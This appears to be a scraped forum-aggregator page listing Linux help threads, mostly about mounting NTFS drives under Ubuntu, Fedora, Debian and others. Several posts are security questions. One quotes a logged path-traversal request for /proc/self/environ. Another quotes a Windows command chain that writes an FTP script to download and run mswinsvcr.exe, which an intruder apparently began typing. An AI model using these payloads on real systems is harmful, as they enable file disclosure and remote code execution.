Ubuntu Security :: Mount.ntfs Ran On Its Own - Normal Or External Hack/break-in Attempt?

Aug 2, 2010

Running Ubuntu 10.04 I noticed my hard disc rumbling for longer than normal and louder. Not doing anything demanding to cause hard disk activity like this so I was suspicious so I checked my process list with 'top' command in the console terminal. At the top was mount.ntfs running. Eventually it stopped running after 20 seconds or so. At the time I have not been accessing NTFS filesystems, but I do have them. I have a dual boot Ubuntu 10.04 and Windows 7. In Ubuntu I've mounted the Windows main C drive and on the same hard disk a partitioned drive for sharing files between the OSs. I know mount.ntfs is a standard program but was it being run on my machine, instigated externally here? Was the running of mount.ntfs an attempt from outside to hack into Ubuntu and the mounted Windows areas of my machine via a backdoor connection or vulnerability? I've restarted my machine since then. Are there any logs I can check for malicious attempts to break in?

View 9 Replies


ADVERTISEMENT

Debian :: PHP Hack Attempt Logs?

Apr 13, 2011

I have received the following log messages on my Debian Squeeze webserver:Apr 13 15:16:37 vps suhosin[4699]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'controller' (attacker '75.126.235.115', file '/var/www/xxxxxxxxxxxxx.com

75.126.235.115 - - [13/Apr/2011:15:16:37 +0100] "GET /index.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8018 "-" "libwww-perl/6.01"

[code]....

View 1 Replies View Related

Fedora :: Mount Ntfs Through Normal User?

Jul 30, 2009

Quote:

Originally Posted by G�del

It gets me within a mile

how i am auto mount the ntfs drives through the normal user with out asking password... I need it and also one thing is i want two drives only auto mount and when i open the other drives it should ask the password?...

View 1 Replies View Related

Slackware :: Allow Normal Users To Write On NTFS External Hard Disk?

Dec 4, 2010

i have installed Salix 13.1 LXDE version (Salix 13.1 is compatible with Slackware 13.1). I must use various external hard disks formatted with NTFS. The hard disks are automatically recognized and mounted with PCmanFM file manager, but only user root can write on them. How can I allow normal users to write on automounted external ntfs drives?

View 3 Replies View Related

OpenSUSE :: Mount NTFS By Normal Users So Used The Entry In Fstab?

May 20, 2011

i want to mount NTFS by normal users so i used the following entry in fstab /dev/sda6 /media/Mostafa ntfs-3g noauto,exec,rw,user 0 0 however when i try to mount the partition i get the following error Unable to mount Mostafa

Error mounting: mount exited with exit code 1: helper failed with:
Error opening '/dev/sda6': Permission denied
Failed to mount '/dev/sda6': Permission denied
Please check '/dev/sda6' and the ntfs-3g binary permissions,
and the mounting user ID. More explanation is provided at
NTFS-3G Questions at Tuxera

[Code]...

View 6 Replies View Related

Fedora :: Grant Permission To Mount Ntfs File System For Normal User ?

Feb 19, 2010

I'm able to mount ntfs file system as root user but I want the same thing to be allowed to normal user .

I'm not much familier with linux environment so please explain me how to do that for normal user.

View 3 Replies View Related

Ubuntu :: Auto Mount Options For External NTFS?

Jan 31, 2010

Have a 1TB external USB hard drive I want to use on both Windows and Linux (Mythbuntu 9.10), so I thought the easiest way would be to format it with NTFS. Installed the NTFS-3G package and I'm able to read and write to the drive fine from Linux, however I have a few questions;

1) How do I configure Linux so that when it mounts the NTFS partition it is writeable for user, group and other (bascially I want everyone to have read and write access)? Currently when the NTFS disk is mounted the permissions are restricted to the user only and I suspect I'll need to edit fstab for this, but don't have much experience here so need help with the specifics.

2) If my Linux PC is turned on with the external drive attached, the disk is not mounted until I double click on the icon on the desktop. Is there anyway I can configure Linux so that it will automatically mount the external disk when booting?

Below is what is in my fstab file at present;

Quote:

# /etc/fstab: static file system information.
#
# -- This file has been automaticly generated by ntfs-config --
#
# <file system> <mount point> <type> <options> <dump> <pass>

[Code]....

View 5 Replies View Related

Hardware :: How To Mount NTFS External Drive

May 6, 2011

I have WD external 1TB USB 3.0 drive that I want to attach to a RHEL 5 computer. I don't want to format it to a FAT32 as I'm copyong over about 530GB of data. What is the easy to get the RHEL OS to recognize this drive? NTFS is not loaded on this system as I already checked.

View 3 Replies View Related

Ubuntu Networking :: Mount External Ntfs Hd As User AND Being Able To Share?

Mar 14, 2010

I have an ntfs external hd; I can mount and use it fine, without entry in fstab, but not share stuff. That is to say: I can use nautilus / thunar to share folders on it without errors, but they are not accessible via the network. The issue may be that the mount point has permissions 700. I can solve that by Code:sudo mount -t ntfs-3g /dev/sdb1 /media/Databank -o umask=0,nls=utf8or by setting umask=022 in fstab, but then I can't mount it as user anymore; if I set fstab to

Code:
/dev/sdb1 /media/Databank ntfs-3g user,umask=022,nls=utf8,defaults 0 0
I get this when I try to mount it as user in the filebrowser:

[code]....

View 1 Replies View Related

Debian Configuration :: Can't Auto-Mount External NTFS Volume

Apr 6, 2010

I have successfully mounted my Win7 volume and my external hard drives NTFS volume as well. However, after modifying the fstab I seem to only be getting the win7 volume to auto-mount. Below is the contents of my fstab. /dev/sdf3 is not mounting. Again, it works no problem if I manually mount it.

# /etc/fstab: static file system information.
#
# <file system> <mount point> <type>  <options> <dump> <pass>

[code]....

View 6 Replies View Related

Red Hat / Fedora :: Unable To Mount External USB With Ntfs Partition In Cent Os

Jan 22, 2011

I have 500GB external HDD. I have to mount it my CenOS -4.8 Machine.(kernel-2.6.9.89EL 32-bit) . External HDD partitions are ntfs file system partition. I have tried to mount ntfs partition in linux . But it's not done.

mount partition with ntfs parttion in linux.

View 3 Replies View Related

Hardware :: Unable To Mount NTFS External Hard Drive

Jun 21, 2011

I'm having problems mounting my NTFS external hard drive .

dmseg :

Code:

1.padlock: VIA PadLock Hash Engine not detected.
2.PPP MPPE Compression module registered
3.PPP BSD Compression module registered
4.PPP Deflate Compression module registered
5.npviewer.bin[5405]: segfault at ff99cd48 ip ff99cd48 sp bfc8afac error 4
6.usb 4-2: new high speed USB device using ehci_hcd and address 5

[code].....

View 2 Replies View Related

General :: External Hard Drive Can Not Mount On, It Is Of Ntfs Filesystem?

Apr 10, 2011

my external HDD of 750GB bring me an error during mounting!it asks me to get to windows and reboot twice or cmd chkdsk/f of which when i do it only option comes is to format it, i do not wanna format it coz it's with a lot of ma useful data!am using debian just asking if its possible to retrieve ma data from it using commands persay and what are those

View 2 Replies View Related

General :: Set NTFS (fuseblk) External Media To Mount With UTF-8 Filesystem

Dec 24, 2010

Kubuntu 10.10 nicely mounts vfat external media as UTF-8, see for example my disk-on-key:

Code:
/dev/sdd1 on /media/DOTANCOHEN type vfat (rw,nosuid,nodev,uhelper=udisks,uid=1002,gid=1002,shortname=mixed,dmask=0077,utf8=1,showexec)

However, NTFS external media is not UTF-8, and it is giving this user a hassle as her native language cannot be represented in ASCII: Code:
[Code]....

View 2 Replies View Related

Debian Hardware :: Easy Way To Mount And Unmount External USB NTFS Hard Drive

Dec 16, 2010

I am trying to mount an external USB hard drive. I'm using Debian Lenny 5. I tried to right-click on the hard drive and then select the mount command inside the gnome desktop environment but it gives me an error. Is there an easy way to mount and unmount this hard drive? The hard drive itself is formatted from the factory in NTFS. I'm going to leave it in this file format is a need to use it with Windows machines as well.

View 4 Replies View Related

Security :: Hack Website For CCNA Study Sake?

Jan 11, 2010

I am currently taking my CCNA course. I have come to realize that to be a great Admin and secure a companies data, you first have to know it's weakness. Now I have become aware of a few programs like John the ripper telnet password crack, nmap, and the like. Well I have used nmap to port scan my own website for practice. I received some good intel on what ports are open and vulnerable. I am now trying to figure out how to hack in.To get my website info I used :

[Code]...

View 12 Replies View Related

Ubuntu Security :: Unwanted Remote Desktop Access And Attempted Hack

Jul 20, 2010

I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e

I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]

How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?

What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?

In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.

View 9 Replies View Related

Ubuntu :: Mount.ntfs And Mount.ntfs-3g Reside Simultaneously?

Mar 4, 2010

Can mount.ntfs and mount.ntfs-3g reside simultaneously?

Whilst accessing an external NTFS drive mount.ntfs takes up a lot of CPU. I am not sure if its mounting the drive using mount.ntfs or mount.ntfs-3g? How do I find out and if they coexist how do I make the default mount drive ntfs-3g?

View 3 Replies View Related

Ubuntu Security :: Require Password To Mount External Drives?

Sep 1, 2010

Is there a way in Lucid to require a sudo password to mount all external drives (e.g. thumb drives, USB CD/DVD drives, USB hard drives)

View 1 Replies View Related

Ubuntu Security :: Ecrypted External Hard Drive Partition Won't Mount Or Unmount?

Nov 15, 2010

I've been running Linux for a year on our family computers (one desktop, one laptop and two netbooks). I've run into a problem with the encrypted ext4 partition (270GB) on a LaCie external hard drive which also has a NTFS partition (50GB) which is not encrypted . First two times I tried using the encrypted ext4 partition (from two different computers) it worked fine but now I can't access it at all. I can still access the NTFS partition.Encrypted external hard drive partition will unlock but won't mount (or unmount). The computer says "Opening 320GB Hard Disk" but after a minute says, "Unable to mount location. DBus error org.freedesktop.DBus.Error.NoReply"Disk utility (GUI for gparted I believe) states that the encrypted partition (/dev/sdb1) is unlocked and the underlying partition (/dev/dm-0) is not mounted but it has a "busy circle sign" on it that will not turn off. The NTFS partition on the same drive mounts and accesses normally.

But if I try to unmount the NTFS partition, it says: "Unable to stop drive. One or more partitions are busy on /dev/sdb"If I try to shut down the computer, it is unable to shut down because (I assume) it can't shut down that drive either. So I have to just turn off the computer.fdisk states that /dev/dm-0 doesn't have a valid partition table [full output attached]fsck suggests: "Filesystem mounted or opened exclusively by another program?"ps axuf shows some processes running on /dev/dm-0 but killinghem doesn't release the drive either. [full output attached]I checked /etc/blkid.tab (suggested in one vaguely related thread) and there's no actual file only a broken link pointing to /dev/.blkid.tab (which doesn't exist). I tried deleting this link and rebooting but that didn't change anything.when I finally gave up my data as lost, I tried to format the partition (using Disk Utility) and it refused saying, "One or more block devices are holding /dev/sdb"

View 1 Replies View Related

OpenSUSE Hardware :: Failure Mounting External NTFS Drive And Internal NTFS Partition / Fix This?

Jul 18, 2010

Just installed 11.3 on my computer, however when I connect an external NTFS harddisk I receive an error message. When I open dolphin to connect to an internal NTFS partition I receive the message:

org.freedesktop.Hal.Device.PermissionDeniedByPolicy: org. freedesktop.hal.storage.mount-fixed auth_admin_keep_always <--

Anyone having an idea how I can fix this?

View 9 Replies View Related

Ubuntu Security :: Break In Through Disabled Root Account?

Nov 11, 2010

If root is disabled by default, how is it possible that someone managed to SSH into my computer using root? I never enable/set password for root, it's always left as the default as per a fresh install and I always use sudo for any admin tasks.Auth.logFirst there are a whole load of failed attempts then...

Code:
Nov 8 11:07:32 Morris-Desktop sshd[3601]: Failed password for root from 94.243.50.53 port 4360 ssh2

[code]...

View 9 Replies View Related

General :: Mount - Use The Advanced NTFS-FS Package To Automount A NTFS Filesystem ?

Mar 6, 2010

I want to enable Advanced NTFS-3G support (permissions and users) automatically from the fstab entry.

View 1 Replies View Related

Fedora Security :: Finding The Source Of A Break In ?

Jul 16, 2010

I noticed a very very high cpu usage on my webserver. All four CPUs were running on 100%.

Top shows several perl processes from apache that run for a long time, with a high %CPU.

Since the server was fc10, I did a fresh installation to fc13, and the fresh installation didn't have this issue. Then I loaded back all the user-data, and it started again.

Several, 4, 6, 8, ... 100 perl processes from apache.

lsof -p with the pid of such a process

Code:

The estabilished connection is sometimes "proud2pirate.com" wich is a non-existing domain.

View 14 Replies View Related

OpenSUSE Install :: 11.3 Security Update Will Break Adobe AIR / Tweetdeck

Apr 4, 2011

The libxml2 update specified by CVE-2010-4494 causes a notification that it will break Adobe AIR and TweetDeck on my machine.How can I blacklist this update so it won't keep showing up in the Updater applet?The applet says I should go into Yast and manually apply the update. When I do that and tell it not to apply the update, Yast exits and the Updater applet just tells me the update is still pending. I want to get rid of the update at least temporarily until Adobe fixes the dependency (assuming they ever do).

This is a major problem for me as I clearly don't intend to uninstall TweetDeck and AIR just for some security patch. Why didn't openSUSE test this patch for AIR compatibility?

View 6 Replies View Related

Ubuntu Security :: Undesired Access Attempt To Localhost

Jun 29, 2011

While investigating my localhost access logs during an investigation to resolve locking myself out of my own server(!) I noticed this recent access attempt from a proxy referrer. I wouldn't expect this on a local server - currently set to listen on 127.0.01. The request was 403 forbidden, but surely the request should not have even reached this far? Is this an example of an unauthorised access attempt? I don't think it is me because all of my usual access requests are in moz 5 and im logged in to linux currently.

Note please do not click this link as I do not know where it leads ^^^^! (and i dont know how to disable it on this forum)

View 8 Replies View Related

Fedora Security :: Script To Add Security Spin Tools To Normal Installation

May 22, 2011

love security/pentest tools. This script adds ALL the tools from the Security Spin, plus Metasploit. Feel free to modify it if need be.

View 12 Replies View Related

Fedora Security :: Install Security Lab Menu On A Normal 13 Installation?

May 30, 2010

Is it possible to install security lab menu on a normal Fedora 13 installation? I don't want to use security spin.

View 14 Replies View Related

Security :: Legititmate Internet Connections Logged In To Server As Break In Attempts?

Oct 22, 2010

On my server I some times login from my home where I have an internet connection which does not have a static IP each time I switch on my modem a dynamic IP isgenerated.I see in auth.log logs of following lines Quote:reverse mapping checking getaddrinfo forkkts-kk-dynamic-01.1.168.192.some_broadband.in [192.168.1.2] failed - POSSIBLE BREAK-IN ATTEMPT Accepted publickey for root from 192.168.1.2 port 22852 ssh2when ever I login to my server from home.In this case I do know that it was me who logged in but still why do I see such a log.What is this complaining about?

View 11 Replies View Related

Ubuntu Security :: GKSU Terminates After 1 Incorrect Password Attempt

Nov 19, 2010

Just like the title says, if I were to try to run anything through gksu and accidentally put in an incorrect password, instead of the gksu window coming up again, it would just terminate.

Code:
theyain@theyain-laptop:~$ gksu update-manager
GNOME_SUDO_PASSGNOME_SUDO_PASSSorry, try again.
sudo: 3 incorrect password attempts

Whats interesting is that it gives me the sudo error after only one incorrect password attempt.

View 8 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved